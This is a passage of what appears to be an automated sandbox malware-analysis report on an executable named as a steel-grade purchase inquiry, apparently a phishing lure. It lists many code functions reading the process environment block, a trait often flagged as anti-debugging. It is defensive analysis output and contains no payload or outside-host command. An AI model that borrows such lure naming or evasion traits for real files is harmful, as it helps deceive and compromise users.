Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F362A0 mov eax, dword ptr fs:[00000030h]		0_2_00F362A0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F362A0 mov eax, dword ptr fs:[00000030h]		0_2_00F362A0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDE284 mov eax, dword ptr fs:[00000030h]		0_2_00EDE284
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDE284 mov eax, dword ptr fs:[00000030h]		0_2_00EDE284
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F20283 mov eax, dword ptr fs:[00000030h]		0_2_00F20283
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F20283 mov eax, dword ptr fs:[00000030h]		0_2_00F20283
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F20283 mov eax, dword ptr fs:[00000030h]		0_2_00F20283
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F50274 mov eax, dword ptr fs:[00000030h]		0_2_00F50274
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F50274 mov eax, dword ptr fs:[00000030h]		0_2_00F50274
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F50274 mov eax, dword ptr fs:[00000030h]		0_2_00F50274
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F50274 mov eax, dword ptr fs:[00000030h]		0_2_00F50274
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F50274 mov eax, dword ptr fs:[00000030h]		0_2_00F50274
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F50274 mov eax, dword ptr fs:[00000030h]		0_2_00F50274
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F50274 mov eax, dword ptr fs:[00000030h]		0_2_00F50274
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F50274 mov eax, dword ptr fs:[00000030h]		0_2_00F50274
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F50274 mov eax, dword ptr fs:[00000030h]		0_2_00F50274
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F50274 mov eax, dword ptr fs:[00000030h]		0_2_00F50274
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F50274 mov eax, dword ptr fs:[00000030h]		0_2_00F50274
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F50274 mov eax, dword ptr fs:[00000030h]		0_2_00F50274
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E9826B mov eax, dword ptr fs:[00000030h]		0_2_00E9826B
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA4260 mov eax, dword ptr fs:[00000030h]		0_2_00EA4260
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA4260 mov eax, dword ptr fs:[00000030h]		0_2_00EA4260
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA4260 mov eax, dword ptr fs:[00000030h]		0_2_00EA4260
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F5A250 mov eax, dword ptr fs:[00000030h]		0_2_00F5A250
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F5A250 mov eax, dword ptr fs:[00000030h]		0_2_00F5A250
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F7625D mov eax, dword ptr fs:[00000030h]		0_2_00F7625D
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F28243 mov eax, dword ptr fs:[00000030h]		0_2_00F28243
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F28243 mov ecx, dword ptr fs:[00000030h]		0_2_00F28243
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA6259 mov eax, dword ptr fs:[00000030h]		0_2_00EA6259
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E9A250 mov eax, dword ptr fs:[00000030h]		0_2_00E9A250
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E9823B mov eax, dword ptr fs:[00000030h]		0_2_00E9823B
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB03E9 mov eax, dword ptr fs:[00000030h]		0_2_00EB03E9
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB03E9 mov eax, dword ptr fs:[00000030h]		0_2_00EB03E9
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB03E9 mov eax, dword ptr fs:[00000030h]		0_2_00EB03E9
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB03E9 mov eax, dword ptr fs:[00000030h]		0_2_00EB03E9
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB03E9 mov eax, dword ptr fs:[00000030h]		0_2_00EB03E9
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB03E9 mov eax, dword ptr fs:[00000030h]		0_2_00EB03E9
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB03E9 mov eax, dword ptr fs:[00000030h]		0_2_00EB03E9
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB03E9 mov eax, dword ptr fs:[00000030h]		0_2_00EB03E9
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED63FF mov eax, dword ptr fs:[00000030h]		0_2_00ED63FF
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EBE3F0 mov eax, dword ptr fs:[00000030h]		0_2_00EBE3F0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EBE3F0 mov eax, dword ptr fs:[00000030h]		0_2_00EBE3F0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EBE3F0 mov eax, dword ptr fs:[00000030h]		0_2_00EBE3F0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F443D4 mov eax, dword ptr fs:[00000030h]		0_2_00F443D4
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F443D4 mov eax, dword ptr fs:[00000030h]		0_2_00F443D4
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EAA3C0 mov eax, dword ptr fs:[00000030h]		0_2_00EAA3C0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EAA3C0 mov eax, dword ptr fs:[00000030h]		0_2_00EAA3C0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EAA3C0 mov eax, dword ptr fs:[00000030h]		0_2_00EAA3C0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EAA3C0 mov eax, dword ptr fs:[00000030h]		0_2_00EAA3C0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EAA3C0 mov eax, dword ptr fs:[00000030h]		0_2_00EAA3C0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EAA3C0 mov eax, dword ptr fs:[00000030h]		0_2_00EAA3C0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA83C0 mov eax, dword ptr fs:[00000030h]		0_2_00EA83C0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA83C0 mov eax, dword ptr fs:[00000030h]		0_2_00EA83C0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA83C0 mov eax, dword ptr fs:[00000030h]		0_2_00EA83C0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA83C0 mov eax, dword ptr fs:[00000030h]		0_2_00EA83C0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F4E3DB mov eax, dword ptr fs:[00000030h]		0_2_00F4E3DB
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F4E3DB mov eax, dword ptr fs:[00000030h]		0_2_00F4E3DB
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F4E3DB mov ecx, dword ptr fs:[00000030h]		0_2_00F4E3DB
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F4E3DB mov eax, dword ptr fs:[00000030h]		0_2_00F4E3DB
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F263C0 mov eax, dword ptr fs:[00000030h]		0_2_00F263C0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F5C3CD mov eax, dword ptr fs:[00000030h]		0_2_00F5C3CD
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E9E388 mov eax, dword ptr fs:[00000030h]		0_2_00E9E388
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E9E388 mov eax, dword ptr fs:[00000030h]		0_2_00E9E388
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E9E388 mov eax, dword ptr fs:[00000030h]		0_2_00E9E388
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EC438F mov eax, dword ptr fs:[00000030h]		0_2_00EC438F
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EC438F mov eax, dword ptr fs:[00000030h]		0_2_00EC438F
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E98397 mov eax, dword ptr fs:[00000030h]		0_2_00E98397
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E98397 mov eax, dword ptr fs:[00000030h]		0_2_00E98397
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E98397 mov eax, dword ptr fs:[00000030h]		0_2_00E98397
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F4437C mov eax, dword ptr fs:[00000030h]		0_2_00F4437C
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F6A352 mov eax, dword ptr fs:[00000030h]		0_2_00F6A352
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F48350 mov ecx, dword ptr fs:[00000030h]		0_2_00F48350
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F2035C mov eax, dword ptr fs:[00000030h]		0_2_00F2035C
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F2035C mov eax, dword ptr fs:[00000030h]		0_2_00F2035C
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F2035C mov eax, dword ptr fs:[00000030h]		0_2_00F2035C
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F2035C mov ecx, dword ptr fs:[00000030h]		0_2_00F2035C
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F2035C mov eax, dword ptr fs:[00000030h]		0_2_00F2035C
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F2035C mov eax, dword ptr fs:[00000030h]		0_2_00F2035C
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F7634F mov eax, dword ptr fs:[00000030h]		0_2_00F7634F
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F22349 mov eax, dword ptr fs:[00000030h]		0_2_00F22349
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F22349 mov eax, dword ptr fs:[00000030h]		0_2_00F22349
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F22349 mov eax, dword ptr fs:[00000030h]		0_2_00F22349
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F22349 mov eax, dword ptr fs:[00000030h]		0_2_00F22349
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F22349 mov eax, dword ptr fs:[00000030h]		0_2_00F22349
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F22349 mov eax, dword ptr fs:[00000030h]		0_2_00F22349
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F22349 mov eax, dword ptr fs:[00000030h]		0_2_00F22349
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F22349 mov eax, dword ptr fs:[00000030h]		0_2_00F22349
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F22349 mov eax, dword ptr fs:[00000030h]		0_2_00F22349
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F22349 mov eax, dword ptr fs:[00000030h]		0_2_00F22349
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F22349 mov eax, dword ptr fs:[00000030h]		0_2_00F22349
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F22349 mov eax, dword ptr fs:[00000030h]		0_2_00F22349
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F22349 mov eax, dword ptr fs:[00000030h]		0_2_00F22349
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F22349 mov eax, dword ptr fs:[00000030h]		0_2_00F22349
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F22349 mov eax, dword ptr fs:[00000030h]		0_2_00F22349
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F78324 mov eax, dword ptr fs:[00000030h]		0_2_00F78324
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F78324 mov ecx, dword ptr fs:[00000030h]		0_2_00F78324
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F78324 mov eax, dword ptr fs:[00000030h]		0_2_00F78324
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F78324 mov eax, dword ptr fs:[00000030h]		0_2_00F78324
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDA30B mov eax, dword ptr fs:[00000030h]		0_2_00EDA30B
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDA30B mov eax, dword ptr fs:[00000030h]		0_2_00EDA30B
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDA30B mov eax, dword ptr fs:[00000030h]		0_2_00EDA30B
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E9C310 mov ecx, dword ptr fs:[00000030h]		0_2_00E9C310
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EC0310 mov ecx, dword ptr fs:[00000030h]		0_2_00EC0310
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA04E5 mov ecx, dword ptr fs:[00000030h]		0_2_00EA04E5
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA64AB mov eax, dword ptr fs:[00000030h]		0_2_00EA64AB
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F2A4B0 mov eax, dword ptr fs:[00000030h]		0_2_00F2A4B0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED44B0 mov ecx, dword ptr fs:[00000030h]		0_2_00ED44B0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F5A49A mov eax, dword ptr fs:[00000030h]		0_2_00F5A49A
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F2C460 mov ecx, dword ptr fs:[00000030h]		0_2_00F2C460
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ECA470 mov eax, dword ptr fs:[00000030h]		0_2_00ECA470
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ECA470 mov eax, dword ptr fs:[00000030h]		0_2_00ECA470
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ECA470 mov eax, dword ptr fs:[00000030h]		0_2_00ECA470
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F5A456 mov eax, dword ptr fs:[00000030h]		0_2_00F5A456
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDE443 mov eax, dword ptr fs:[00000030h]		0_2_00EDE443
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDE443 mov eax, dword ptr fs:[00000030h]		0_2_00EDE443
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDE443 mov eax, dword ptr fs:[00000030h]		0_2_00EDE443
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDE443 mov eax, dword ptr fs:[00000030h]		0_2_00EDE443
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDE443 mov eax, dword ptr fs:[00000030h]		0_2_00EDE443
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDE443 mov eax, dword ptr fs:[00000030h]		0_2_00EDE443
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDE443 mov eax, dword ptr fs:[00000030h]		0_2_00EDE443
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDE443 mov eax, dword ptr fs:[00000030h]		0_2_00EDE443
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E9645D mov eax, dword ptr fs:[00000030h]		0_2_00E9645D
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EC245A mov eax, dword ptr fs:[00000030h]		0_2_00EC245A
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E9E420 mov eax, dword ptr fs:[00000030h]		0_2_00E9E420
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E9E420 mov eax, dword ptr fs:[00000030h]		0_2_00E9E420
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E9E420 mov eax, dword ptr fs:[00000030h]		0_2_00E9E420
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E9C427 mov eax, dword ptr fs:[00000030h]		0_2_00E9C427
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F26420 mov eax, dword ptr fs:[00000030h]		0_2_00F26420
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F26420 mov eax, dword ptr fs:[00000030h]		0_2_00F26420
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F26420 mov eax, dword ptr fs:[00000030h]		0_2_00F26420
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F26420 mov eax, dword ptr fs:[00000030h]		0_2_00F26420
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F26420 mov eax, dword ptr fs:[00000030h]		0_2_00F26420
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F26420 mov eax, dword ptr fs:[00000030h]		0_2_00F26420
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F26420 mov eax, dword ptr fs:[00000030h]		0_2_00F26420
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDA430 mov eax, dword ptr fs:[00000030h]		0_2_00EDA430
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED8402 mov eax, dword ptr fs:[00000030h]		0_2_00ED8402
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED8402 mov eax, dword ptr fs:[00000030h]		0_2_00ED8402
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED8402 mov eax, dword ptr fs:[00000030h]		0_2_00ED8402
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDC5ED mov eax, dword ptr fs:[00000030h]		0_2_00EDC5ED
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDC5ED mov eax, dword ptr fs:[00000030h]		0_2_00EDC5ED
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA25E0 mov eax, dword ptr fs:[00000030h]		0_2_00EA25E0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ECE5E7 mov eax, dword ptr fs:[00000030h]		0_2_00ECE5E7
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ECE5E7 mov eax, dword ptr fs:[00000030h]		0_2_00ECE5E7
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ECE5E7 mov eax, dword ptr fs:[00000030h]		0_2_00ECE5E7
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ECE5E7 mov eax, dword ptr fs:[00000030h]		0_2_00ECE5E7
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ECE5E7 mov eax, dword ptr fs:[00000030h]		0_2_00ECE5E7
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ECE5E7 mov eax, dword ptr fs:[00000030h]		0_2_00ECE5E7
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ECE5E7 mov eax, dword ptr fs:[00000030h]		0_2_00ECE5E7
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ECE5E7 mov eax, dword ptr fs:[00000030h]		0_2_00ECE5E7
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDE5CF mov eax, dword ptr fs:[00000030h]		0_2_00EDE5CF
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDE5CF mov eax, dword ptr fs:[00000030h]		0_2_00EDE5CF
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA65D0 mov eax, dword ptr fs:[00000030h]		0_2_00EA65D0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDA5D0 mov eax, dword ptr fs:[00000030h]		0_2_00EDA5D0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDA5D0 mov eax, dword ptr fs:[00000030h]		0_2_00EDA5D0
